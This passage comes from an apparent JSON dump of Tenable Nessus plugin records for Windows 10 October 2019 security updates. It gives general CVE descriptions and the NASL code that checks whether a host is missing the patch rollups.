(CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520011.NASL", "href": "https://www.tenable.com/plugins/nessus/129726", "published": "2019-10-08T00:00:00", "title": "KB4520011: Windows 10 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129726);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520011\");\n script_xref(name:\"MSFT\", value:\"MS19-4520011\");\n\n script_name(english:\"KB4520011: Windows 10 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520011.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4520011/windows-10-update-kb4520011\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8905e062\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520011.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520011');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520011])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520004.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520004.NASL", "href": "https://www.tenable.com/plugins/nessus/129721", "published": "2019-10-08T00:00:00", "title": "KB4520004: Windows 10 Version 1709 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129721);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520004\");\n script_xref(name:\"MSFT\", value:\"MS19-4520004\");\n\n script_name(english:\"KB4520004: Windows 10 Version 1709 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520004.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520004/windows-10-update-kb4520004\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d0b932\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520004.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520004');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520004])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520003\nor cumulative update 4519976. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 